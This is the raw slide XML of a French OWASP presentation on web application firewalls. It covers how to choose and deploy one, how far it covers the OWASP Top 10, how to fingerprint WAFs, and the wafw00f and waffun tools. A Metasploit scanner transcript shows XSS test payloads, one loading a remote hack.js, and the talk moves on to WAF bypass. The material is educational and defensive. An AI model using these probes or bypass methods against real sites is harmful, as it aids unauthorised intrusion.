            <a:pPr marL="285750" indent="-285750" algn="just" defTabSz="622300" eaLnBrk="0" hangingPunct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80000"/>
              <a:buFont typeface="Wingdings" pitchFamily="-65" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="-65" charset="0"/>
                <a:sym typeface="Tahoma" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>Président du CLUSIR Poitou-Charentes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just" defTabSz="622300" eaLnBrk="0" hangingPunct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80000"/>
              <a:buFont typeface="Wingdings" pitchFamily="-65" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="-65" charset="0"/>
                <a:sym typeface="Tahoma" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>OWASP France Leader &amp; Evangéliste (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="-65" charset="0"/>
                <a:sym typeface="Tahoma" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>sebastien.gioria@owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="-65" charset="0"/>
                <a:sym typeface="Tahoma" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just" defTabSz="622300" eaLnBrk="0" hangingPunct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80000"/>
              <a:buFont typeface="Wingdings" pitchFamily="-65" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" pitchFamily="-65" charset="0"/>
              <a:sym typeface="Tahoma" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56336" name="Picture 16" descr="rsz_s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95400"/>
            <a:ext cx="1927225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5119221"/>
            <a:ext cx="8305800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22300" eaLnBrk="0" hangingPunct="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80000"/>
              <a:buFont typeface="Wingdings" pitchFamily="-65" charset="2"/>
              <a:buChar char="q"/>
            </a:pP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</a:rPr>
              <a:t>Domaines de prédilection : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="730250" lvl="1" indent="-550863" defTabSz="622300" eaLnBrk="0" hangingPunct="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Font typeface="Wingdings" pitchFamily="-65" charset="2"/>
              <a:buChar char="ü"/>
            </a:pP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</a:rPr>
              <a:t>Web 4.2 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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</a:rPr>
              <a:t>WebServices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="Tahoma" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>, Insécurité du Web.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Tahom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WAF – En ai-je besoin ? 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 bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="-873270" y="3657600"/>
            <a:ext cx="45720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609600" y="5638800"/>
            <a:ext cx="67818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590800" y="6096000"/>
            <a:ext cx="332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Accès aux sources de l’application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2513" y="2438400"/>
            <a:ext cx="430887" cy="1841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600" dirty="0" smtClean="0"/>
              <a:t>Bénéfice d’un WAF</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600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1295400" y="3429000"/>
            <a:ext cx="59436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rot="5400000" flipH="1" flipV="1">
            <a:off x="1904205" y="3505200"/>
            <a:ext cx="45720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685800" y="1143000"/>
            <a:ext cx="720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FF01"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Elevé</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00FF0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34200" y="5715000"/>
            <a:ext cx="82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Aucun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66800" y="5791200"/>
            <a:ext cx="659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FF01"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Total</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00FF0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10000" y="5791200"/>
            <a:ext cx="81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6600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Partiel</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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4530" y="3242846"/>
            <a:ext cx="83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6600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Moyen</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF66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3400" y="5257800"/>
            <a:ext cx="777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Faible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 flipV="1">
            <a:off x="1371600" y="1295400"/>
            <a:ext cx="4724400" cy="358140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17526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Accès total aux sources, et aux développeurs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981200" y="24456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Majoritairement développé en interne, disponibilité des sources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800600" y="23694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Majoritairement développé en externe, peu de sources disponibles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638800" y="98762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Boite Noire</a:t>
            </a:r>
            <a:endParaRPr lang="fr-F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49362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" smtClean="0"/>
              <a:t>Web Application Firewall Evaluation Criteria (WAFEC)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fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Projet du Web Application Security Consortium</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>www.webappsec.org/projects/wafec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Liste les fonctionnalités possibles d’un WAF et non les fonctions minimum nécessaires d’un WAF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Permet d’évaluer techniquement le meilleur WAF pour son environnement en fonction de 9 critères :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Type d’architecture à déployer (pont, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse-proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>, intégré, SSL, …)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Support d’HTTP et d’HTML (Versions, encodages,…) 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Techniques de détection (signatures, techniques de normalisation du trafic, …)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Techniques de protection (brute force, cookies, sessions, …)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Journalisation (intégration NSM, type de logs, gestion des données sensibles, …)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Rapports (types de rapports, distribution, format, …) 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Administration (politiques, logs, …) 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Performance (nb de connexions/s, latences, …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="788988" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Support XML (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>WS-i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> intégration, validation XML/RPC, …)</a:t>
            </a:r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WAF – Mise en place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Choisir le type (centralisé, décentralisé, performances, …) =&gt; Projet WAFEC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Mettre en place l’organisation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Désigner (au minimum) un « WAF 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manager » en lien avec les équipes infrastructures et développement.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Rôle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>technico-MOA</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Mettre en place la protection minimale </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>XSS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Blind-SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Définir les priorités des applications à protéger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Itérer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1246188" lvl="2" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Traçage des requêtes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1246188" lvl="2" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Mise en place de la protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1246188" lvl="2" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Contrôle de l’effectivité de la protection.</a:t>
            </a:r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WAF – OWASP Top10 – Mise en Place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599" cy="561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174"/>
                <a:gridCol w="3701669"/>
                <a:gridCol w="1831622"/>
                <a:gridCol w="199813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Top10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WAF Commentaire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r>
                        <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> de mise en place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Sur un WAF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Code/Configuration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A1 (XSS)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Ne</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> voit pas les XSS persistants (pas de filtres en sortie)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Bloque la majorité des attaques en fonction du moteur de canonisation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 à Forte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A2 (Injections)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Bon sur les protocoles connus (SQL) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
                        <a:t>grace</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t> au </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
                        <a:t>blacklistage</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t> de caractères.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 à Forte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A3 (RFI)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Peut</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> se coupler avec un A/V via ICAP, permet de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>whitelister</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> les paramètres autorisés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 a Moyenne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Moyenne a Forte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A4 (Insecure </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
                        <a:t>Objects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Masquerade</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> possible des ID internes.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Très Faible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 a Moyenne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A5 (CSRF)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Peut ajouter des ID à la volée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Moyenne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WAF – OWASP Top10 – Mise en Place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" y="1066800"/>
          <a:ext cx="9143998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461"/>
                <a:gridCol w="2976823"/>
                <a:gridCol w="2367642"/>
                <a:gridCol w="204107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Top10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WAF Commentaire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r>
                        <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> de mise en place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Sur un WAF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Code/Configuration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A6 (Info </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
                        <a:t>Leak/Error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Bloque</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> facilement les accès aux URL non autorisées, mais détecte difficilement les erreurs coté serveur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 à Forte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A7 (Auth &amp; Session)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Dépend du WAF et du Serveur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Applicatif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Moyenne à </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Forte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 a Forte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A8 (Crypto)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Applicable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Applicable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A9</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (SSL/VPN)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Totalement adapté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A10 (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
                        <a:t>Restrict</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t> URL)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Blacklistage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Failbe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rgbClr val="E6E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’OWASP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Web Application Firewalls (WAF)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Choisir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Mythes et réalités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mode d’emploi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>S’amuser avec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Et après ?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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Détection des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>WAFs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Certains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>WAFs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t> laissent beaucoup d’informations sur leur présence : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Cookies :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>barra_counter_session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>NCI__SessionId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>, WODSESSION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Server=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>profense</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Server=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>BinarySec</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Réponses a des attaques (trigger de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>blacklist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>) dans les headers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>HTTP/1.1 200 Condition </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Intercepted</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>HTTP/1.1 200 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Forbidden</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>HTTP/1.1. 407 Proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Authentication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Required</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Ou les pages par défaut !!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&lt;h1&gt;System </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>!&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>hr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&gt;&lt;/h1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&gt;Action not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>authorized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>!&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>……</a:t>
            </a:r>
          </a:p>
          <a:p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Détection des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>WAFs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4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Wafw00f  présenté à l’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>AppSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t> EU 2009.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Script python se basant sur une base de détection interne.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Waffun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> présenté à l’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>AppSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> EU 2009 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Script python de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>fuzzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> pour construire une liste de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> du WAF.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4798308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Détection des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>WAFs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4800" y="1000065"/>
            <a:ext cx="8458200" cy="532453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./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msfconsole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[-] ***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[-] ***</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1"/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    # ###### #####   ##    ####  #####  #       ####  # #####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##  ## #        #    #  #  #      #    # #      #    # #   #  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 ## # #####    #   #    #  ####  #    # #      #    # #   #  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    # #        #   ######      # #####  #      #    # #   #  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    # #        #   #    # #    # #      #      #    # #   #   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#    # ######   #   #    #  ####  #      ######  ####  #   #   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1"/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      =[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v3.3-dev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+ -- --=[ 396 exploits - 239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payloads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+ -- --=[ 20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encoders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- 7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nops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      =[ 267 aux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1"/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&gt; use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auxiliary/scanner/http/wimps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auxiliary(wimps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) &gt; set XSSVECTOR  /Users/eagle/.msf3/modules/auxiliary/scanner/http/xssvector.txt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XSSVECTOR =&gt; /Users/eagle/.msf3/modules/auxiliary/scanner/http/xssvector.txt</a:t>
            </a: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auxiliary(wimps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) &gt; set RPORT 443</a:t>
            </a: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RPORT =&gt; 443</a:t>
            </a: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auxiliary(wimps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) &gt; set SSL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true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SSL =&gt;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true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auxiliary(wimps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) &gt; set RHOST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www.wafforwimps.org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RHOST =&gt; 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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.wafforwimps.org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pPr marL="0" lvl="1"/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msf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auxiliary(wimps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) &gt;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run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[*]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Loading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Database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[*]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Testing</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Typewriter"/>
              <a:cs typeface="Lucida Sans Typewriter"/>
            </a:endParaRPr>
          </a:p>
          <a:p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./&lt;script&gt;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alert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(XSS)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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Found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some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WAF signature</a:t>
            </a:r>
          </a:p>
          <a:p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./&lt;body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onload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=‘’http://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www.wafforwinps.org/hack.js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’’ &gt;</a:t>
            </a:r>
          </a:p>
          <a:p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Found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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1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some</a:t>
            </a:r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 WAF signature</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Typewriter"/>
                <a:cs typeface="Lucida Sans Typewriter"/>
              </a:rPr>
              <a:t>……….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Typewriter"/>
              <a:cs typeface="Lucida Sans Typewrite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Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>WAFs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WAFs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> sera toujours </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>bypassé</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> s’il n’implémente pas le modèle positif.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Toute tentative de :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Blacklist</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Règle de type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>regular-expression</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Réseau neuronal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
